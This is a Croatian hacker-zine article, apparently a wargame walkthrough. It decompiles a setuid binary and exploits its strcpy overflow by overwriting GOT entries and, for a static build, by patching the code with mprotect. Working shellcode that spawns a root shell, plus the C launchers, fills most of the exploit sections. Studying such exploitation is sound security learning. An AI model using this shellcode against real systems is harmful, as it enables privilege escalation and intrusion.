Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

3x08 xtreem Exploiting Steps

eZine's profile picture
eZine lover (@eZine)
Published in 
phearless
 · 14 Jan 2024

 
                              ................... 
                        ...::: phearless zine #3 :::... 
			     
.....................>---[ xtreem Exploiting Steps ]---<...................... 

............................>---[ by h4z4rd ]---<............................. 
		                                         memearser[at]yahoo[dotcom		 
             
0x1 [intro] 
0x2 [binary_decompilation] 
0x3 [exploiting .got] 
0x4 [exploiting -static] 
0x5 [outro] 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 0x1 [intro] 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

Exploiting steps je naziv za korake koje cemo napraviti da bi od jednostavnog 
binarya, dekompilacijom doci do source codea, indentificirati ranjivi dio, te na 
nekoliko metoda i u razlicitim uvjetima exploitati program. Za razumijevanje texta 
bilo bi pozeljno da znate osnove asm-a, c-a, elf-a, osnovne buffer overflow  
tehnike i snalazite se sa gdb-om. Svi primjeri su na linuxu, ali se tehnika  
moze primjeniti na ostale *nix-e koji koriste elf. Primjer koji cemo rjesavati  
je dio pulltheplug.org vortex wargamea.  

//////////////////////////////////////////////////////////////////////////// 
--==<[ 0x2 [binary_decompilation] 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

Ajmo odmah krenuti i vidjeti o cemu se radi i sto smo dobili za zadatak: 

[hazard: decomp]$ file level8 
level8: ELF 32-bit LSB executable, Intel 80386, version 1 MathCoPro/FPU/MAU Required 
(SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped 

Za zadatak smo dobili elf binary, fajl nije strippan sto ce nam olaksat posao i 
necemo morati vracati symbol table. Sada da vidimo koje funkcije se skrivaju u fajlu 
i da vidimo otprilike sta cemo dekompajlirat: 

[hazard: decomp]$ objdump -R level8 

level8:     file format elf32-i386 

DYNAMIC RELOCATION RECORDS 
OFFSET   TYPE              VALUE 
08049834 R_386_GLOB_DAT    __gmon_start__ 
08049838 R_386_COPY        stdout 
0804980c R_386_JUMP_SLOT   fflush 
08049810 R_386_JUMP_SLOT   pthread_create 
08049814 R_386_JUMP_SLOT   setresuid 
08049818 R_386_JUMP_SLOT   sleep 
0804981c R_386_JUMP_SLOT   __libc_start_main 
08049820 R_386_JUMP_SLOT   printf 
08049824 R_386_JUMP_SLOT   getuid 
08049828 R_386_JUMP_SLOT   getgid 
0804982c R_386_JUMP_SLOT   setresgid 
08049830 R_386_JUMP_SLOT   strcpy 

Odmah mozemo probat identificirat ranjive djelove koda, a to je sigurno stcpy, vidimo 
da imamo posla sa threadovima (pthread_create), te getuid/getgid i setresgid. Iz 
ovoga vec mozemo u grubo zakljucit sto se u programu dogadja. Program kreira thread 
(pthread_create), uzima nase privilegije (getuid/getgid) i postavlja neke privilegije 
(setresgid). Sljedece sto cemo napraviti je dissasemblat binary i korak po korak 
sastavit sto bolje mozemo originalni source. Stoga krenimo dissasmat fajl: 

[hazard: decomp]$ gdb ./level8 
GNU gdb 6.3 
Copyright 2004 Free Software Foundation, Inc. 
GDB is free software, covered by the GNU General Public License, and you are 
welcome to change it and/or distribute copies of it under certain conditions. 
Type "show copying" to see the conditions. 
There is absolutely no warranty for GDB.  Type "show warranty" for details. 
This GDB was configured as "i686-pc-linux-gnu"...Using host libthread_db library 
"/lib/tls/libthread_db.so.1". 

(gdb) disas main 
Dump of assembler code for function main: 

0x080485c4 <main+0>:    push   %ebp 
0x080485c5 <main+1>:    mov    %esp,%ebp 
0x080485c7 <main+3>:    sub    $0x8,%esp 
0x080485ca <main+6>:    and    $0xfffffff0,%esp 
0x080485cd <main+9>:    mov    $0x0,%eax 
0x080485d2 <main+14>:   sub    %eax,%esp 

0x080485d4 <main+16>:   push   $0x0 
0x080485d6 <main+18>:   push   $0x8048564 
0x080485db <main+23>:   push   $0x0 
0x080485dd <main+25>:   lea    0xfffffffc(%ebp),%eax 
0x080485e0 <main+28>:   push   %eax 
0x080485e1 <main+29>:   call   0x8048424 <pthread_create> 
0x080485e6 <main+34>:   add    $0x10,%esp 

0x080485e9 <main+37>:   sub    $0x4,%esp 
0x080485ec <main+40>:   sub    $0xc,%esp 
0x080485ef <main+43>:   call   0x8048484 <getgid> 
0x080485f4 <main+48>:   add    $0xc,%esp 
0x080485f7 <main+51>:   push   %eax 
0x080485f8 <main+52>:   sub    $0x8,%esp 
0x080485fb <main+55>:   call   0x8048484 <getgid> 
0x08048600 <main+60>:   add    $0x8,%esp 
0x08048603 <main+63>:   push   %eax 
0x08048604 <main+64>:   sub    $0x4,%esp 
0x08048607 <main+67>:   call   0x8048484 <getgid> 
0x0804860c <main+72>:   add    $0x4,%esp 
0x0804860f <main+75>:   push   %eax 
0x08048610 <main+76>:   call   0x8048494 <setresgid> 
0x08048615 <main+81>:   add    $0x10,%esp 

0x08048618 <main+84>:   sub    $0x4,%esp 
0x0804861b <main+87>:   sub    $0xc,%esp 
0x0804861e <main+90>:   call   0x8048474 <getuid> 
0x08048623 <main+95>:   add    $0xc,%esp 
0x08048626 <main+98>:   push   %eax 
0x08048627 <main+99>:   sub    $0x8,%esp 
0x0804862a <main+102>:  call   0x8048474 <getuid> 
0x0804862f <main+107>:  add    $0x8,%esp 
0x08048632 <main+110>:  push   %eax 
0x08048633 <main+111>:  sub    $0x4,%esp 
0x08048636 <main+114>:  call   0x8048474 <getuid> 
0x0804863b <main+119>:  add    $0x4,%esp 
0x0804863e <main+122>:  push   %eax 
0x0804863f <main+123>:  call   0x8048434 <setresuid> 
0x08048644 <main+128>:  add    $0x10,%esp 

0x08048647 <main+131>:  sub    $0xc,%esp 
0x0804864a <main+134>:  mov    0xc(%ebp),%eax 
0x0804864d <main+137>:  add    $0x4,%eax 
0x08048650 <main+140>:  pushl  (%eax) 
0x08048652 <main+142>:  call   0x80485a4 <unsafecode> 
0x08048657 <main+147>:  add    $0x10,%esp 
0x0804865a <main+150>:  leave 
0x0804865b <main+151>:  ret 
End of assembler dump. 
(gdb) 

Hm, ovo bas ne izgleda kao nesto iz cega mozete rekonstruirat source, ali iza ovoga 
se zapravo krije struktura programa, te je zapravo zacudjujuce jednostavno 
dekompajlirat ovakve binarye. Nekoliko stvari koje bi trebali znati o funkcijama, i 
generalnoj strukturi kompajliranog koda. Na pocetku svake funkcije se nalaze naredbe 
koje stvaraju novi stack frame za trenutnu funkciju. Na taj nacin kad izadjemo iz 
funkcije mozemo jednostavno pobrisat sve koristene podatke. Stack frame kreiramo sa 
ovim naredbama: 
	push   %ebp 
	mov    %esp,%ebp 
nakon toga slijedi sub $0xN, %esp sa cim rezerviramo mjesto za lokalne varijable, te 
na kraju  
	and    $0xfffffff0,%esp 
	mov    $0x0,%eax 
	sub    %eax,%esp 
sto zapravo ne radi nista pametno, a vjerovatno sluzi za neki padding. Valja 
napomenuti da ovo vrijedi za slucajeve kada je program kompajliarn bez optimizacije 
jer u suprotnom gcc generira drukciji kod, te na razne nacine modificira standardni 
kod da bi se kod brze izvrsavao.  
Kod rekonstrukcije je vazno odrediti tocan broj ulaznih i izlaznih parametara, broj i 
velicinu lokalnih varijabli, njihov redosljed, funkcije koje se pozivaju i na koji 
nacin, instrukcije granjanja i petlje. Prva stvar koju cemo utvrditi je koliko parametara 
funkcija main ocekuje i kojeg su tipa. Svi parameti koje neka funkcija dobiva se 
nalaze iznad trenutnog stack framea, tako da se parametrima pristupa preko relativne 
adrese 0xN(%ebp) sto znaci 0xN+vrijednost ebp-a (pocetka trenutnog stack framea). Da 
bi utvrdili koliko parametara funkcija dobiva jednostavno pogledamo koja je najveca 
vrijednost iznad framea kojoj funkcija pristupa. Ovdje to mozemo vidjeti na liniji 
<main+134> mov 0xc(%ebp),%eax ovdje stavljamo vrijednos 0xc+$ebp u eax, te pushamo 
adresu na koju ono pokazuje. Prevedeno u c to bi znacilo da pozivamo funkciju main sa 
argumentima int i char** (4+4+4=0xc prva 4bajta su pushani ebp) i ocekuje da 
proslijedimo jedan argument tipa string. Lokalne varijable identificiramo na slican 
nacin, gledamo za kolko je umanjen esp i gdje se koristi memorija ispod ebp, te na 
taj nacim mozemo utvrdit gdje se sta nalazi, koliko je veliko i kojeg je tipa. Ovdje 
vidimo da se ovdje jedino adresira memorija 0xfffffffc(%ebp) (tj. $ebp-0x4) stoga 
mozemo zakljucit da imamo samo jednu lokalnu varijablu veliku 4bajta. A kako je ta 
varijabla prvi parametar pthread_create funkciji znamo da je tipa pthread_t. Ostali 
parametri pthread_create funkcije redom su 0, 0x8048564, 0. Da rezimiramo sta smo do 
sada dekompajlirali i vidjeli idemo li dobrim putem napisat cemo kratak c kod i 
kompajlirat ga: 

[hazard: decomp]$ cat > decomp.c 
#include <pthread.h> 
#include <stdio.h> 

main(int argc, char *argv[]) 
{ 
        pthread_t tid; 
        pthread_create(&tid, 0, 0x8048564, 0); 
} 
[hazard: decomp]$ gcc decomp.c -o de -pthread 
[hazard: decomp]$ gdb --quiet ./de 
Using host libthread_db library "/lib/tls/libthread_db.so.1". 
(gdb) disas main 
Dump of assembler code for function main: 
0x080483cc <main+0>:    push   %ebp 
0x080483cd <main+1>:    mov    %esp,%ebp 
0x080483cf <main+3>:    sub    $0x8,%esp 
0x080483d2 <main+6>:    and    $0xfffffff0,%esp 
0x080483d5 <main+9>:    mov    $0x0,%eax 
0x080483da <main+14>:   sub    %eax,%esp 
0x080483dc <main+16>:   push   $0x0 
0x080483de <main+18>:   push   $0x8048564 
0x080483e3 <main+23>:   push   $0x0 
0x080483e5 <main+25>:   lea    0xfffffffc(%ebp),%eax 
0x080483e8 <main+28>:   push   %eax 
0x080483e9 <main+29>:   call   0x80482e4 <pthread_create> 
0x080483ee <main+34>:   add    $0x10,%esp 
0x080483f1 <main+37>:   leave 
0x080483f2 <main+38>:   ret 
End of assembler dump. 
(gdb) 

Kompajliranjem smo dobili gotovo identicni kod (osim adrese pthread_create funkcije 
koja ovisi o poziciji got-a). Sljedeci koda koji promatramo su tri poziva getgid i 
nakon njih setresgid. Da bi return vrijednost proslijedili kao input drugoj funkciji 
mozemo ili povratne vrijednosti spremati u varijable (ret=func();func2(ret);) ili 
mozemo funkciji proslijediti kao parametar drugu funkciju koja kad se izvrsi 
automatski predaje izlaz kao ulaz funkciji u kojoj je pozvana (func2(func());) u 
prvom slucaju bi trebali alocirati varijable, dok u drugom netrebamo vec ce se izlazi 
odmah push-at na stack kao parametri novoj funkciji. Kako ovdje imamo 3 getgid-a koji 
svoje izlazne vrijednosti push-aju na stack i nakon njih setresgid koji ocekuje 3 
parametra mozemo zakljuciti da je c kod izgledao ovako: 
setresgid(getgid(),getgid(),getgid()); 

Sljeci dio koda je isti kao i prethodni samo u ovom slucaju imamo 3 getuid-a i 
setresuid, te bi to izgledalo ovako: 
setresuid(getuid(),getuid(),getuid()); 

Nakon toga imamo kod koji izgleda ovako: 
	mov    0xc(%ebp),%eax	;stavi adresu drugog parametra maina u eax 
	add    $0x4,%eax	;dodaj 4 eax-u (tj. uzmi drugi pointer argv-a) 
	pushl  (%eax)		;stavi adresu na koju pokazuje eax na stack 
	call   0x80485a4 <unsafecode>	;pozovi unsafecode funkciju 
	add    $0x10,%esp	;pocisti iza sebe 

Tj. u c-u: 
unsafecode(argv[1]); 

Rekonstruirali smo cijelu main funkciju koja izgleda ovako: 
main(int argc, char *argv[]) 
{ 
        pthread_t tid; 
        pthread_create(&tid, 0, 0x8048564, 0); 
        setresgid(getgid(),getgid(),getgid()); 
        setresuid(getuid(),getuid(),getuid()); 
        unsafecode(argv[1]); 
} 

Sljedeci korak je identifikacija funkcija. Prva funkcija koju susrecemo je parametar 
pthread_create funkciji.  
(gdb) disas 0x8048564 
Dump of assembler code for function safecode: 
0x08048564 <safecode+0>:        push   %ebp 
0x08048565 <safecode+1>:        mov    %esp,%ebp 
0x08048567 <safecode+3>:        sub    $0x8,%esp 

0x0804856a <safecode+6>:        movl   $0x0,0xfffffffc(%ebp) 

0x08048571 <safecode+13>:       sub    $0x8,%esp 
0x08048574 <safecode+16>:       pushl  0xfffffffc(%ebp) 
0x08048577 <safecode+19>:       push   $0x8048708 
0x0804857c <safecode+24>:       call   0x8048464 <printf> 
0x08048581 <safecode+29>:       add    $0x10,%esp 

0x08048584 <safecode+32>:       sub    $0xc,%esp 
0x08048587 <safecode+35>:       pushl  0x8049838 
0x0804858d <safecode+41>:       call   0x8048414 <fflush> 
0x08048592 <safecode+46>:       add    $0x10,%esp 

0x08048595 <safecode+49>:       sub    $0xc,%esp 
0x08048598 <safecode+52>:       push   $0x1 
0x0804859a <safecode+54>:       call   0x8048444 <sleep> 
0x0804859f <safecode+59>:       add    $0x10,%esp 

0x080485a2 <safecode+62>:       jmp    0x8048571 <safecode+13> 
End of assembler dump. 

Iz ovoga mozemo odmah zakljucit da funkcija nema ulaznih parametara, ne vraca nista, 
da ima jednu lokalnu varijablu najvjerovatnije tipa int, da je u igri neka petlja i 
poziva 3 funkcije (printf,fflush,sleep). Nakon sto je varijabla postavljena na 0 
pocinje petlja, u ovom slucaju nemozemo tocno odredit koja je petlja u pitanju, moze 
biti nesto tipa for(var=0;;){} ili while(1){} i u oba slucaja cemo kompajliranjem 
dobit isto kod. Zbog kompaktnosti koda ja cu se odlucit za for(var=0;;). Sljedeca 
funkcija je printf, i ima 2 argumenta prvi je format string tipa: 
(gdb) x/s 0x8048708 
0x8048708 <_IO_stdin_used+4>:    "%d\n" 

a drugi parametar je nasa varijabla (%d nam pokazuje da pretpostavka o tipu int bila 
tocna). 
Sljedeca je funkcija fflush koja ima jedan parametar: 
(gdb) x/x 0x8049838 
0x8049838 <stdout@@GLIBC_2.0>:  0x4017ac00 

I na kraju slijedi sleep(1). Kada sve ovo spojimo dobijemo: 
safecode() 
{ 
        int i; 
        for(i=0;;) 
        { 
                printf("%d",i); 
                fflush(stdout); 
                sleep(1); 
        } 

} 

Secer na kraju je unsafecode, koja kao argument uzima char *, ima jedan lokalni 
buffer velicine (0x408-0x8=1024) i poziva strcpy sa argumentima buffer i argument, te 
izgleda ovako: 
unsafecode(char *str) 
{ 
        char buf[1024]; 
        strcpy(buf,str); 
} 

Kada spojimo cijeli dekompajlirani program dobijemo ovo: 
#include <pthread.h> 
#include <stdio.h> 
#include <unistd.h> 

safecode() 
{ 
        int i; 
        for(i=0;;) 
        { 
                printf("%d",i); 
                fflush(stdout); 
                sleep(1); 
        } 

} 

unsafecode(char *str) 
{ 
        char buf[1024]; 
        strcpy(buf,str); 
} 

main(int argc, char *argv[]) 
{ 
        pthread_t tid; 
        pthread_create(&tid, 0, (void *) safecode, 0); 
        setresgid(getgid(),getgid(),getgid()); 
        setresuid(getuid(),getuid(),getuid()); 
        unsafecode(argv[1]); 
} 

Uspjesno smo dekompajlirali zadani binary i sada mozemo poceti sa exploitanjem. 
Da bi uspjesno dekompajlirali neki fajl prvo identificirajte glavnu funkciju, njene 
parametre i varijable. Onda rastavite kod na logicke cjeline (naredbe grananja, 
petlje, matematicke operacije...) i jednu po jednu ih rjesavajte i slazite ko puzzle 
dok ne sastavite cijeli kod. Tada predjite na funkcije i na isti nacin ih rijesite. 
Za dio koda koji niste sigurni kako ga dekompajlirat napravite par skica u c-u kako 
mislite da to izgleda kompajlirajte, usporedite i preslagujte dok ne dobijete isti 
kod. Sto vise iskustva u programiranju sa jezikom koji dekompajlirate to lakse 
dekompajlirat. 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 0x3 [exploiting .got] 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

Ako promotrimo source vidimo 2 funkcije, jednu koja se izvrsava kao thread a druga se 
poziva iz main funkcije. Kao sto ime sugerira safecode je sigurna funkcija, u njoj 
nema sigurnosnih propusta, dok u unsafecode-u mozemo odmah identificirati standardni 
buffer overflow. Da stvar ne bude tako banalna prije pozivanja unsafecode-a program 
postavlja privilegije izvrsavanja na one pozivatelja programa te na taj nacin 
onemogucuje da exploitanjem dobijemo suid privilegije. Kako se safecode thread 
pokrece prije setres(uid/gid)-a ona ce zadrzati originalne privilegije. Kako tu 
funkciju nemozemo exploitati moramo naci nacin da preuzmemo kontrolu nad tokom 
izvrsavanja te funkcije. Kako je thread funkcija koja se izvrsava istovremeno sa 
pozivajucom funkcijom onda postuje sve zakone obicne funkcije. Jedan od zakona koje 
mora postovati je da pri pozivanju externih funkcija cita u .got entry-u adresu 
zeljene funkcije i skace na tu adresu. Kako .got nije ni na koji nacin zasticen mi 
mozemo pisati po njemu proizvoljno iz bilo kojeg dijela programa. To znaci da mi iz 
uz pomoc unsafecode funkcije mozemo pokrenut shellcode koji nece imat zeljene 
privilegije ali ce nam omogucit da prepisemo .got entry neke funkcije koju poziva 
safecode sa adresom pravog shellcode-a i na taj nacim dobit zeljene privilegije. Sada 
cemo konstruirati shellcode pomocu kojega cemo izvrsiti navedeno. 
[hazard: ex_got]$ cat hellcode.asm 
BITS 32 

;nadji adresu shellcodea u memoriji 
jmp short faddr_sc 
sc_faddr: 

;spremi addr sc-a u ebx 
pop ebx 

;u eax adresa .got-a da prepisemo sa addr sc-a 
mov long eax, 0x0804980c 
mov long [eax],ebx 

mov long eax, 0x08049818 
mov long [eax],ebx 

mov long eax, 0x08049820 
mov long [eax],ebx 

;neka se unsafecode zabavlja dok se mi igramo u shellu 
play: 
jmp short play 

faddr_sc: 
call sc_faddr 

;setresuid 
xor eax,eax 
mov al, 0xa4 

;ruid=euid=suid=0 
xor ebx, ebx 
xor ecx, ecx 
xor edx, edx 

int 0x80 

jmp short       faddr_txt 
txt_faddr: 

pop             esi 
xor             eax, eax 
mov byte        [esi + 7], al 
lea             ebx, [esi] 
mov long        [esi + 8], ebx 
mov long        [esi + 12], eax 
mov byte        al, 0x0b 
mov             ebx, esi 
lea             ecx, [esi + 8] 
lea             edx, [esi + 12] 
int             0x80 

faddr_txt: 
call            txt_faddr 
db              '/bin/sh#AAAABBBB' 

A sada da testiramo exploit: 
[hazard: ex_got]$ l|grep level8; cat ex.c;gcc ex.c -o ex;./ex 
-rwsr-xr-x  1 root   root    13K Jun 24 16:12 level8* 
#include <stdio.h> 

char shellcode[] = 
        "\xeb\x18\x5b\xb8\x0c\x98\x04\x08\x89\x18\xb8\x18\x98\x04\x08" 
        "\x89\x18\xb8\x20\x98\x04\x08\x89\x18\xeb\xfe\xe8\xe3\xff\xff" 
        "\xff\x31\xc0\xb0\xa4\x31\xdb\x31\xc9\x31\xd2\xcd\x80\xeb\x1a" 
        "\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0" 
        "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff" 
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41\x42\x42" 
        "\x42\x42"; 

 

int main(void) 
{ 
        char buf[1067], *p; 
        char *env[3] = {shellcode, NULL}; 
        int 
ret=0xbffffffa-strlen(shellcode)-strlen("/home/hazard/develop/ph/ex_got/level8"); 
        for (p=buf;(p-buf)<1067;p+=4) 
                *((void **)p)=(void *) (ret); 
        *p='\0'; 
        execle("/home/hazard/develop/ph/ex_got/level8","level8",buf,NULL,env); 
} 

0 
sh-2.05b# id 
uid=0(root) gid=501(hazard) groups=501(hazard) 

xaxa ;) tako ljepo i kratko. Exploit je sam po sebi prilicno jednostavan i jasan. 
Koristimo tehniku pokretanja vuln programa pomocu execle i predavanja env-a sto nam 
omogucuje da tocno izracunamo pocetak shellcode-a (nema pogadjanja offseta), pokrene 
se shellcode, nadje adresu pravog shellcode-a prepise .got entry-e i loop-a jer ne 
zelimo terminat glavni program jer bi to ubilo i thread, i dok on loop-a mi skocimo u 
root shell. 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 0x4 [exploiting -static] 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

Kad smo bili raspravljali o prethodnom problemu deroko je zadao malo modificirani 
problem tj. sta ako je program kompajliran sa -static. To znaci da nema .got tablice 
i mora se naci drugi nacin za exploitat. Bio je tako dobar da je odmah dao i 
rjesenje, mprotect i code segment modifikacija. Kako smo u stanju kontrolirati jedan 
segment programa i izvrsit shellcode, mozemo promjeniti parametre memorije i dodati 
write na code segment i na taj nacin prepisati safecode funkciju sa npr. nasim 
shellcode-om i na taj nacin dobit zeljene privilegije.  

[hazard: ex_static]$ gcc decomp.c -static -o staticx -pthread 

Expoit za ovaj problem je isti kao i prethodni samo imamo malo modificirani shellcode koji 
prvo poziva mprotect, te nakon toga mjenja jmp for petlje tako da skoci na nas shellcode. 
Shellcode izgleda ovako: 

[hazard: ex_static]$ cat hell_static.asm 
BITS 32 

;reg cleanup 
xor eax, eax 
xor ebx, ebx 
xor ecx, ecx 
xor edx, edx 

;mprotect(0x8048000,0x1111,0x7); 
mov al, 0x7d            ;mprotect syscall num 
mov ebx, 0x08048001     ;addr 
dec ebx 
mov cx, 0x1001          ;size 
dec cx 
mov dl, 0x7             ;mask 
int 0x80 

;nadji adresu shellcodea u memoriji 
jmp short faddr_sc 
sc_faddr: 

;spremi addr sc-a u ebx 
pop ebx 

;prebrisi u programu postojeci jmp sa jmp na shellcode 
; -ecx adresa na koju pisemo 
; -u ebx jmp vrijednost 
mov ecx, 0x08048242 
sub ebx, ecx 
sub bl, 0x5 

mov al, 0xE9 
mov [ecx], al 
mov [ecx+1], ebx 

;neka se unsafecode zabavlja dok se mi igramo u shellu 
play: 
jmp short play 

faddr_sc: 
call sc_faddr 

;setresuid 
xor eax,eax 
mov al, 0xa4 

;uid=euid=suid=0 
xor ebx, ebx 
xor ecx, ecx 
xor edx, edx 

int 0x80 

jmp short       faddr_txt 
txt_faddr: 

pop             esi 
xor             eax, eax 
mov byte        [esi + 7], al 
lea             ebx, [esi] 
mov long        [esi + 8], ebx 
mov long        [esi + 12], eax 
mov byte        al, 0x0b 
mov             ebx, esi 
lea             ecx, [esi + 8] 
lea             edx, [esi + 12] 
int             0x80 

faddr_txt: 
call            txt_faddr 
db              '/bin/sh#AAAABBBB' 

Sada da ga testiramo jel radi: 
[hazard: ex_static]$ cat ex_staticx.c 
#include <stdio.h> 

char shellcode[] = 
        "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x7d\xbb\x01\x80\x04\x08" 
        "\x4b\x66\xb9\x01\x10\x66\x49\xb2\x07\xcd\x80\xeb\x14\x5b\xb9" 
        "\x42\x82\x04\x08\x29\xcb\x80\xeb\x05\xb0\xe9\x88\x01\x89\x59" 
        "\x01\xeb\xfe\xe8\xe7\xff\xff\xff\x31\xc0\xb0\xa4\x31\xdb\x31" 
        "\xc9\x31\xd2\xcd\x80\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e" 
        "\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56" 
        "\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" 
        "\x23\x41\x41\x41\x41\x42\x42\x42\x42"; 

int main(void) 
{ 
        char buf[1067], *p; 
        char *env[3] = {shellcode, NULL}; 
        int 
ret=0xbffffffa-strlen(shellcode)-strlen("/home/hazard/develop/ph/ex_static/staticx"); 
        for (p=buf;(p-buf)<1067;p+=4) 
                *((void **)p)=(void *) (ret); 
        *p='\0'; 
        execle("/home/hazard/develop/ph/ex_static/staticx","staticx",buf,NULL,env); 
} 
[hazard: ex_static]$ gcc ex_staticx.c -o ex 
[hazard: ex_static]$ ./ex 
0sh-2.05b# id 
uid=0(root) gid=501(hazard) groups=501(hazard) 

I ovo smo uspjesno exploitali. Naravno postoji jos nekoliko nacina da se ovaj program 
exploita sa -static-om ali to ostavljam vama na istrazivanje. Ako neko uspjesno exploita 
na neki drugi nacin, neka posalje na mail pa da objavimo u sljedecem broju ;) 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 0x5 [outro] 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

Ovdje su predstavljena dva nestandardna buffer overflowa koji ce vam nadam se pomoci da 
poboljsate svoje tehnike i razumijevanje istih. Exploiting je jako zanimljivo mjesto gdje 
mozete vjezbati svoju mastu i programerske vjestine. Ako neko hoce jos dalje razvijat 
svoju tehniku neka exploita ovaj program na non-exec stacku. Happy exploiting. 

Greetz to BlackHat team

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
7 May 2024
Situs Sabung Ayam Digmaan
guest's profile picture
@guest
7 May 2024
Sabung Ayam Online
guest's profile picture
@guest
6 May 2024
Situs Sabung Ayam Digmaan
AniphaeS's profile picture
@AniphaeS
5 May 2024
Yes, you are right! The correct spelling is " QUEENS". Thanks a lot for the warning 🙂
guest's profile picture
@guest
5 May 2024
Daikatana was my favorite game on the Nintendo64. I have played it a lot but never managed to complete it 100%
Francesco's profile picture
Francesco Arca (@Francesco)
5 May 2024
Shouldn't be called 'Queens'?
guest's profile picture
@guest
5 May 2024
How long does it take to make beer at home?
guest's profile picture
@guest
5 May 2024
lot of interesting information
guest's profile picture
@guest
4 May 2024
nice
guest's profile picture
@guest
4 May 2024
Situs Sabung Ayam Digmaan
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT